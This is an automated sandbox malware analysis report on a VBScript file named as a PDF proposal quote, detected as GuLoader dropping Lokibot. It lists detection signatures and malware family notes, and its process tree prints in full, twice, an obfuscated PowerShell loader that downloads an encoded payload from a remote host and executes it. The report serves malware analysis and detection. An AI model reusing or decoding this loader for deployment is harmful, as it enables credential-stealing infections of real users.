Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Proposal Quote_2414976#U00b7pdf.vbs

Overview

General Information

Sample name:Request for Proposal Quote_2414976#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name:Request for Proposal Quote_2414976pdf.vbs
Analysis ID:1428348
MD5:4c0d5b830080aa8b72546a6d7f924aca
SHA1:d061aa6f577e894eb58fd4bc64b366e2e7919630
SHA256:56b71885512e781975e310bc62af1a41bd731895d661f5cc49eff2a640806cd0
Tags:vbs
Infos:

Detection

GuLoader, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4320 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Request for Proposal Quote_2414976#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5996 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2228 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Superexcrescence = 1;$Necroscopic18='Substrin';$Necroscopic18+='g';Function Refrig213($Kllert){$Ecstasy=$Kllert.Length-$Superexcrescence;For($Odeum119=7; $Odeum119 -lt $Ecstasy; $Odeum119+=(8)){$Gumminess+=$Kllert.$Necroscopic18.Invoke($Odeum119, $Superexcrescence);}$Gumminess;}function Medicinmands($Allodiaries){.($Deviascope) ($Allodiaries);}$Styggeres=Refrig213 ' GglendMCondensoRugekaszForkldniP okonsl Fe tivl MinimuaBasioph/ Skopu,5Protoc .Si,vanu0Oilwell Oversu (arkitekWPincushiMultiman BordindProgramo.endarmwLitesbes Trolje BogtilNAa.nersT Disput Insta.1Thegidd0typhloe.Luftrum0.onglet;Manipul firmaaWOrderleioutpuncnUn.idyu6 Procta4Anguish; A.tito Haandstx S heno6Finvask4Alle dy;Sidevae ParamyorPhrensivTransfo:melania1Dejeune2Curatis1,efrica.Organ.s0Jeanell)Townsid GrundliGD rklore WillsecForfaldkKejsereomaledi /Syresub2 Stjfor0 ueform1Tricaud0Paakal,0Mesmeri1Miljmyn0S uporh1Bagsder PseudofFFalangiiDaleswor Folkete etakinfPa,tagnoLeukocixSmearin/Partic 1Feudals2Skildre1Frdiggr. Bredba0Uforsta ';$Unpsychologically253=Refrig213 'OvereksU InvestsArticuleBaker.trDatasty-.edgrelASpulziegAnilinfeFemogtynEpithemtDet,nat ';$Cereals148=Refrig213 'JomfruthTippie,tFa,iaditIndolsspNiveauosSeriepr:Saetn n/Su.erbi/Deko.atd slitlirJulerosiGypterev SecreteAssis,e..entralgForkvi oSv,desto Buntmag Defilal VerdeneMesmeri.NringsvcIsoca,poWh.tewamHovedpr/ .ovorduPar,gracSqueaks?gravigreCobaltix ,trygepTrsteproUn ullerSomiklet forkar=ToldgrndSkuerr,ostatsmawPa oxysn MetriclTranspooBeerhouaHerrengdGard.ro&AlarmtiiDisqu,ldT.skeee=Luftlag1Re tallN DrivtmuFore.adRFalckcesProbity3 Tonic.3 GlummepRegel,tJin,ulcaX Evani,EDjvelsbZNglebenqSki.oppH reforgl Prmier9DesolatcSkjternIQuackstaIndru lf AflireO Poly.lpQualityy InteroaDivedam6CoolamouKalkeri7Skalpe IEnhedsp1Lin eluvBaggaarPTekstbeKBegoniaV Immome ';$modularization=Refrig213 'Steelwo>Meddele ';$Deviascope=Refrig213 ' InventiKara,sceSaftp.exDyretmm ';$Bundskrabets = Refrig213 'Ass mese,ilestocUsu apihJoini,goM.nksco majo,em% resultaPosto,tp Smu.hupGreekizdGru dtra SlaumptMithraiaVelgrer%Mirthf,\Tendensg PreseneTrykkernforbrusnUrkrfteeFrequenm SylteksPolyce.gGyri akn Ref,rmiPrecoolnOpret.eg gsindssAdskil,.antasteFTall,njaAcetoacsStartsy Stereot&Exodus &Gu.runn D.laasee .athogcmuriatehBaggingo Baptis Serozem$ vg.igh ';Medicinmands (Refrig213 'B ckpac$RrgtracgDalboarlbedrageoGrunthubBeecheraHaikunml Kilede:R agummG rundleShackinwImpardogElektroa Superlw ScatteyV,lenci=Milieuo(Unplatic KoalitmStamherdStjmaal Overcap/Ud lokkcPreopp Hyperbl$ThaumatBLeucon.uEditor n owdyisd CarroosNoedigtkH,nnahar Bo,seja PotmenbHfte.sse .onputt oestaus rals.o)Ennikes ');Medicinmands (Refrig213 ' Stabel$DominangIndvendlN,biimroSpexenebPlusrepaWithal,lSejrs,t:Irr.denn bis,ekyHandskem Sekun aCita.ioa MothernImpugnme Synga =Ecclesi$RetromaC ma.ufaeD,unmedrSindsbeeIgniti,aAre litlLed,teks.atteti1 Lyttas4Unresus8,eferti.AmusemesminespipQuadratlEarnneti Jdeka tclownis(Upaak.a$ AjlendmCalciumoOpmaalidIntraduuSengetilIndtraeadecenehr S.opkei.ribesyzTonika,aEksament LenderiReassuroP.imaqunGreffot)Kl mren ');$Cereals148=$nymaane[0];Medicinmands (Refrig213 'Oseulov$DiffundgSnebol l,elinquoStibblebPilliveaAcroatilTaarnet:SokratiNForsvoroCabbalanMiljf rfbikini,e SkuffevM toricebruttoar Scop.eiBradsotsRevolveh MillimlTalemaayCratere=Hild nsN Grot,seGrsrddewr ferat-SkidterOSpr,gfrbunreseajDescendeSpinalvcKnaphultOverbbo Ov rskrSDiumviryNrrebrosSekstantDrukkenehypotypmTu,imin.Pre,urlN He.seseBlokindtHelicot.Remo.teWAngili,ePeng.afbKnishesC Pr,dukl Koldsvi tdlisteOffervinFu dskgt Entomi ');Medicinmands (Refrig213 ' Falski$StipendNAzoturio fortilnStruktufSpind neCaterinvDaneworeStackfurSexivaliBouillasOver.rdhB khamrlSquarefyKastnin.KnallerHbotswaneBrandtra SumptedRentesreOmmastrrch,loposJe.loja[Skole.a$applikaUBewil,en ,ommatpDeployesVektoreyLimonencSupporthredubbeopreencllUnmundao iblerngMegalosiForeplecFr,findaOksehallH rnesolRivstyrytennise2Skrivek5Optning3ancien.]roxbury=Stillin$Ski shaSNring btMeantclyTabelopgOver kkgSemiquieBrudefrrEneboe eHrolfgrsBarotro ');$Baandkassette=Refrig213 'AfbdpreN ncoacto Bogstan oumaphfa.meldeeSlaa invBa,tardeSkranker FrigiviKorr lssMeldrjehSlaglerlWhirtleyvortigi.AfblomsDFixatesoFngslinwsequestnpet,eanlirritamoVasoconaScutelsdLashligFSnekas iBufferrlDyrerygeM.croca(Chayspa$SemigeoC Cla.ateBalsamerDistribe Rebs aaJonosfrlUnballasReeject1Opbevar4 Smi st8Ben.asu,Selvtnk$Blndf,iT,arasanrMiljkrai Palm.vl PaketpoSubobsogLaminatiKomm.nis Abetto)Trodsal ';$Baandkassette=$Gewgawy[1]+$Baandkassette;$Trilogis=$Gewgawy[0];Medicinmands (Refrig213 ' Reinoc$BumblergBouffanlPl ckagoLd.rskobShopp.da ForbrnlKontrap:MadopskdYoghurteDe,ivedaBidroggcOmmateuiFyndfordmillibaiMul,elsfHeltalsiAttempte SuperldHinckle= Yach,d(SkruefoTFictioneProsocosSelenittUstulat-Un,ecipPP,ruvataSmrb.omtKontrolhGironsi Frastd$PuttendTTuringbrForsikriSneendelSkamskdoSsterdagApplanaiTobakshsFremsta)Mesomer ');while (!$deacidified) {Medicinmands (Refrig213 'Stokesi$AiledprgSjussetlPolariso MotherbGlaucodaNeut.oplh rkslu: SelvflSForanaltPopulare ptimisrTomentaoT,inglyiLavended Bastiop.verswerAssortepMindsteaLocan.ar,nhalataA corditGearendeReattentAccisen6Eksalte4Skvadro=Fodbol,$For.magtNonrecorHydrolouG,fteneeMa.titi ') ;Medicinmands $Baandkassette;Medicinmands (Refrig213 'UdstraaSEvadeentTskesbia TidnderTusindttDharmas-AlanineS Ultraml Ingre e DiakoneReswo epBjninge Program4 Haybil ');Medicinmands (Refrig213 'Sei mom$UfyldesgSlagvarlAflsseroForce.eb Su.aryaFrigrellSpiritu:Krag.rudFloggereBoligbya UnderscI ochimi QuicksdfootbriiBasketlfTeleutoi Nimblee Abbre dprodukt=Unsigna(PendlinT stabileSemiempsGladelitSemiper-StaalrrPPoluphlaAntyd itB,dbillhBe.andl Myo,ipo$MalpropTTrtidgerStercoriUtriculldatatraoAuktiong Etat.aiVestliksB.devin)Sl fnin ') ;Medicinmands (Refrig213 'Turesso$Me cedigBl,ebrslFredsbeomisbehabbask,tfaSloshinl Njagti:Tr nsmuDCessat i SpangloUdlbsdapAngiocatAntickmr Gearine,revordsR jfnin= Arbej.$.ffidavgR,frygtlUnexpiroAfskridbkna penaVejr orl Aridne:CaddishbSpindlea Spe dexHorsetrtStereopePop.lrvrN.settriLi estia IntracnKommand+F genbl+Brinjau%Fu.lefn$ edfrennRealindyAngelicmhjttaleaIsdessea DisconnFlimf.aeGrundop.PhilosocOpbygnioUnderspuLandhusnRedigertTo.ases ') ;$Cereals148=$nymaane[$Dioptres];}Medicinmands (Refrig213 'Tin.oli$Nucleoag LoppetlJordemoo Leky.hb Tyend.aSpa.ierlQuak er:FeedwatJOssetisoDoktorasQuadrictConventsUd,ldes Skislab=Fourtee OligosaGPlumbice ogribctLu.ubra- FiancaC,marevooGraminanConceitt SupersepandiesnArgynnitOutslid Coa apr$BlyanttTTorrefirWhiz eriSoignrelKlienteo Parro,gTriumfaiBobtailsUnim.ro ');Medicinmands (Refrig213 'Skrubtu$dainvksg Termosls.aryvioLandbrubOverstraFalsummlBrobane:Salvedpa MastoikPanteglvCozenagaResusciv,emiappi TelesktNavi.sgt teamereCym.grarnatkjo. Fessqu.= epichi Whodno[D sspriS Indi ey VocalisPromi,etMcelroye T lskdm Ski.te.unemendCTrefagso OdontonHybelenvTo vtoneMowlandrres.nertCinclid]Merp is:Nause u: play rFTonsillrDem.repoRap,cclmS.mmenkBTilfredaBest.alsMervrdieNsedes 6 fskeds4AbulyeiSWantonntAstmatirImmeritiAnholdtnKn,fordg Mlk tn(Su,erse$ FnatteJMerglinoUltimatsGuttlertAbstinesPrebend)Autosig ');Medicinmands (Refrig213 'Tydelig$Hols.ergRuma,ialAfsesseoNondelib twankaawindballl conis:Gl cehaOKittledp P.stmot BacchaeatmolyzgTabulatnAkt,icee MistanlBal,iums TorbeneKofa.gesTe.rifibRemonstoPrimaltg Blu deeGarde.enTilflyt1Synkrot9 Bagved9Rakkere slg ern=Pa ness Plumrin[MandacaSDtesfugyTims visLangplatLise queNatug.em Masede.Carmel,TFiredeletudistrxPejsesftdigress.MiriamsEStjernenHomoplac EksameoPilothod BurrieiNonrecinLaplndegPu.zler]kommuna:Skovl,n:Jukebo,AForh niSDemonstCPagodalI WaxersI Fladbu.Unt,ranGFravrspeForblfft.maaoveSTraktertAastederAlditoli Leak,gnforhjengUppoura(Dimensi$UdrmmedaHavebrukFormalivS ippleaD.tabasvOpsamlei,ommemotBefrd.dt P,atewe WesterrHarcele)elifdir ');Medicinmands (Refrig213 'Bal,eum$SrbehangFleraarlPre.isloFore.adbAnkomstaOversavlUnderfr:F gomraPDrmm.slr presseo SvindlvRemarrii cateravSpeanini UdbudssConnivee,andatacTyre ektSetnmpsiDroslenoF tometnGulvene=Cy oseu$ Ark bcOCoraisep Reaffit Flacoueorp,nsugSubs.nonGstelree Retrotl PreobtsReagente FremkasArcticwb bakkeroPaatagegK,nomoceSjos,esnOverint1Isadelp9,ucosmi9repatr,.RetslgesmirkyvkuHensynsb RemindsGenvurdtRaa.slar DemoraiOpkalden ThingugSt ikeo( Pipunc3 Bager,2A,niell5Ve,stre3Duksety3 Galope2Pe,mica, Inter.3Semip.i0unoccid3 Semido6Regnest3Tilside)Thala o ');Medicinmands $Provivisection;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2316 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\gennemsgnings.Fas && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 3396 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
        • wab.exe (PID: 5496 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2541238211.0000000008EE0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000009.00000002.3336499423.00000000054C0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        00000005.00000002.2532896490.00000000063BC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000005.00000002.2541730708.000000000AE11000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            00000002.00000002.2698898787.000001A0DA98C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
              Click to see the 4 entries
              SourceRuleDescriptionAuthorStrings
              amsi32_2228.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xe87c:$b2: ::FromBase64String(
              • 0xd94e:$s1: -join
